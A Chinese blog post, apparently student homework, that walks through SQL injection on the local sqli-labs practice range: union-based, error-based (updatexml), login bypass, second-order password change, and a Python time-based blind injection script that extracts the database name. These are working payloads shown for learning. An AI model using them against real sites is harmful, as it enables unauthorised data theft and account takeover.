第一次作业,sql注入总结

已于 2024-08-04 21:13:09 修改
阅读量344 收藏 3
点赞数 4
文章标签: sql 数据库
于 2024-08-04 21:12:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C13136398183/article/details/140910842
版权

sqli-labs靶场中演示:

less1:

注入点为:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

get输入一个id,可以逃逸出单引号来实现sql注入。

正常的输入为,输出数据库中查询的内容。

http://127.0.0.1:8080/sqli-labs/Less-1/?id=1

可以使用union 联合查询  或者报错注入 updatexml(1,conncat(),1)只能显示32位和 extractvalue()联合查询需要知道有几列,可以用order by 找出有几列 ,可以用数字表示列名。

在第四次时报错了,说明有三列:

http://127.0.0.1:8080/sqli-labs/Less-1/?id=1%27%20order%20by%204%23

那么利用union联合查询:

http://127.0.0.1:8080/sqli-labs/Less-1/?id=-1%27%20union%20select%201,user(),database()%23

less5:

报错注入: updatexml(1,conncat(),1)只能显示32位和 extractvalue()

补充:用substr((),1,32)截取前32位,可以避免数据过长出现缺失

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#注入点不变但因为输出内容改变,所有更换注入方式
#正确输出为此
echo 'You are in...........';
#错误输出为此
print_r(mysqli_error($con1));
http://127.0.0.1:8080/sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23

less9:

时间盲注:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
#注入点还是不变,但是正确错误无任何返回值
if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysqli_error($con1));
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}

利用python实现二分查找暴力破解:

import time

import requests

url = 'http://127.0.0.1:8080/sqli-labs/Less-9/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
#注入点使用ascii转成asc码比较数字就可以确定是那个字母,如果匹配成功就沉睡一秒

            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)

若有类似如下报错:

Traceback (most recent call last):
  File "。。。。", line 1, in <module>
    import requests
ModuleNotFoundError: No module named 'requests'

可以win加r,cmd 使用:就可以完成

pip install requests

less11:

post输入一个用户名和密码。

注入点:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

#返回内容为:
		echo 'Your Login name:'. $row['username'];
		echo "<br>";
		echo 'Your Password:' .$row['password'];
		echo "<br>";

        print_r(mysqli_error($con1));

那么依然可以沿用上面思路:

在username出输入:

a'union select 1,user()#

less24:

二次注入:入库出库两步操作  

进入时被过滤无法实现

   $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
   $password = mysqli_real_escape_string($con1, $_POST["login_password"]);
   $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

那么在出库时则没有过滤的内容,就可以在出库时尝试sql注入

$username= $_SESSION["username"];

$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";

在注册账户的内容出输入Dumb'#   ,然后按照要求new password里面就会是修改的Dumb中的密码.

C13136398183
关注
网络安全---SQL注入攻击
zdsxc_的博客
04-05 1332
容器通常是一次性的,因此一旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
渗透测试之sql注入测试练习01
windStudyer的专栏
01-29 411
实验目的: 通过注入拿到数据库版本信息、数据库账号信息、表信息、表数据 实验环境: phpStudy2018 PHP5.4.45 mysql 5.5.53 使用Less-2测试 步骤一:判断是否有注入点 正常输入id=1 url:http://127.0.0.1/sqli/Less-2/?id=1 步骤二: 方法1:使用传统方法看是否有注入 输入id=1 and 1=1 url:http://127.0.0.1/sqli/Less-2/?id=1 and 1=1...
Sql注入第一次作业
Theudq的博客
08-06 733
尝试闭合,加上 ' 后可以发现报错,说明闭合成功,再加入注释符号,使后面的程序不生效,mysql的注释符号有三种:--空格 # /***/;现在我们知道了security数据库中的所有表名,我们需要查询password和username,通常情况下这些数据都会存储到users中,所以我们现在查询users这个表中的所有字段的名字是什么。我们先查询security数据库中的所有表的名字,并以一行输出的方式输出,因为如果不一行输出的话,前端只会显示查询的第一个表名。
代码审计与web安全第四章作业SQL注入
m0_72471315的博客
03-31 1613
代码审计与web安全第四章作业
网络攻防第6次作业——sql注入进阶
木子一个Lee的博客
12-28 161
请查看:(免费)
第一次作业
weixin_65857785的博客
08-06 274
ok现在有表名了,注意哈这里得用group_concat()函数把tablename抱起来,不然会报错受那个limit的影响,接下来继续找列名,发现有3个名字。我这里就让id为负一试试,发现了数据库名字是 security,并且也找到注入点了,于是乎直接破题!发现页面没有显示数据库的库名,但是也没有报错,所以应该是被限制输出一行了。于是随便搞一个id值。最终发现是3列,继续用union尝试。
SQL注入盲注基础
m0_62177883的博客
07-26 1983
如下,就取出了username下的全部数据内容这里,可以在2的位置写上username,3的位置写上password,就可以的到全部数据?指在SQL注入的过程中,找到注入点后,执行SQL语句后,选择的数据或者错误信息不能回显到前端页面。这里需要利用一些方法进行判断或者猜测,这个过程称之为盲注。第八关就用到盲注的方法。因为当输入?id=1时,出现的是只有两种显示,输入正确的语句,就显示youarein......,输入错误的东西,就不显示内容。.....................
第五次作业
qq_61957115的博客
09-01 1357
web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,把用户输入的数据当作代码来执行,获取或修改数据库中的数据。参数化查询通过将SQL语句和用户输入分开,避免将用户输入直接拼接到SQL查询中,从根本上杜绝SQL注入。通过合理设置数据库用户权限,限制数据库用户的操作范围和权限,可以减少SQL注入攻击的影响。判断数据库名第一位是什么,由于使用同样的数据库,且长度为8,故猜测是数据库security。
web十大漏洞--sql注入
m0_71907084的博客
10-30 1565
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
SXU-网络攻防第六次作业-sql注入进阶
12-27
本篇将详细讲解在“SXU-网络攻防第六次作业”中涉及的四种SQL注入类型:报错注入、时间注入、堆叠注入和宽字节注入,并给出相应的实践步骤。 首先,我们来看报错注入。报错注入是通过触发数据库错误来揭示敏感信息...
ASP.NET第一次作业.zip
09-02
在这个名为"ASP.NET第一次作业"的压缩包中,我们可以推断这是一份学习或教学材料,可能是初学者在学习ASP.NET时完成的第一个练习项目。 在ASP.NET中,主要知识点包括: 1. **Web Forms**:这是ASP.NET最初提供的...
"山西大学网络攻防第六次作业SQL注入进阶实战练习
SXU-网络攻防第六次作业-sql注入进阶 山西大学网络攻防第六次作业——sql注入进阶 在本次网络攻防作业中,学生们将进行sql注入的进阶练习,包括报错注入、时间注入、堆叠注入以及宽字节注入。这四种注入技术将在...
【text2sql】基于上下文文学习的MCS-SQL框架在Spider和BIRD取得了新SOTA
m0_46686599的博客
10-11 806
研究背景:大型语言模型(LLMs)在文本到SQL(Text-to-SQL)任务中,通过上下文学习(ICL)方法取得了显著的性能提升,但与人类专家相比,性能仍有较大差距,尤其是在处理复杂数据库模式和查询的基准测试中。 研究方法:本研究提出了一种新方法,利用多个提示(multiple prompts)来探索更广泛的可能答案空间,并有效聚合这些答案。通过多提示强化数据库模式链接,生成多样化的候选SQL查询,并基于置信度分数过滤这些查询,最后通过多项选择(multiple-choice selection)获取最优
[SQL] 数据库图形化安装和使用
qq_45280097的博客
10-11 238
一 安装 1.1图形化安装 下载DataGrip安装包 点击此处 一直下一步即可。 点击免费使用。 进去界面后,选择新建一个项目 点击加号,创建一个Mysql连接。 输入Mysql的连接信息。 点击DownLoad下载Mysql的驱动 接下来点击创建的mysq项目中后面的三个点,选择要显示的哪些数据库 选择完成后点击刷新,这样就会显示出所需要显示的数据库了。 二 创建数据库和表 2.1 创建数据库 右键点击创建的Mysql项目->New->Schem
SQL Injection | MySQL 数据库概述
Blue17 の 小窝
10-12 2122
MySQL 是一个流行的关系型数据库管理系统(RDBMS),它基于 SQL (Structured Query Language)进行操作。MySQL 是由瑞典 MySQL AB 公司开发的,后来被 Sun Microsystems 收购,最终称为 Oracle 公司的产品。它是一个开源项目,遵循 GNU 通用公共许可证(GPL)发布,同时也提供了商业许可。
awk脚本通过将多行拼接成一行并在 SQL 语句的末尾遇到分号(;)时打印出来
u010674101的专栏
10-10 437
这个awk脚本处理 SQL 查询语句时,会识别SELECTUPDATEDELETE和INSERT开头的 SQL 语句,并将可能分布在多行的 SQL 语句拼接成一行,直到遇到分号结束语句。脚本中的其他内容则会原样输出。
QT开发--QT SQL模块
最新发布
荒野
10-13 1150
qt5
LlamaIndex 结构化数据库交互指南增强(text2sql
洛阳泰山的博客
10-10 1348
许多现代数据系统都依赖于结构化数据,例如或Snowflake数据仓库。LlamaIndex提供了许多由LLM提供支持的高级功能,可以从中创建结构化数据 非结构化数据,以及通过增强的文本到 SQL 功能分析这些结构化数据。:任何应用程序都应该意识到,执行 任意SQL查询可能存在安全风险。建议 根据需要采取预防措施,例如使用受限角色、只读 数据库、沙箱等。本指南帮助介绍这些功能中的每一项。SQLsql
牛客SQL29详解 计算用户的平均次日留存率
小啊呜的博客
10-11 385
牛客SQL29详解 计算用户的平均次日留存率 牛客SQL29详解 计算用户的平均次日留存率 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值